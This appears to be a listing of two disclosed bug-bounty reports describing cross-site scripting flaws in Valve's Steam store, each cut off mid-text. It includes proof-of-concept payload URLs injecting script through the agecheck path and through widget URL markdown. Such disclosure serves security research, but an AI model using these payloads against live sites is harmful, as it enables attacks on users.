Valve: XSS @ store.steampowered.com via agecheck path name

Hi, I found a Cross-Site Scripting XSS in store.steampowered.com because the path after /agecheck/ is not sanitized as it should. https://store.steampowered.com/agecheck/appmhuh2', sessionid: gsessionID, ageDay: '', ageMonth: '', ageYear: '' .done function response %20 ;alertXSS-by-TvM;function...

Valve: Xss was found by exploiting the URL markdown on http://store.steampowered.com

Hello guys I found an xss vulnerability on store.steampowered.com markdown POC http://store.steampowered.com/widget/386360/?t=url=google.com:/onclick=%27alertdocument.domain%27url=xss/url Here is my exploit url=google.com:/onclick='alertdocument.domain'url=xss/url Steps 1 - go to any product 2 -...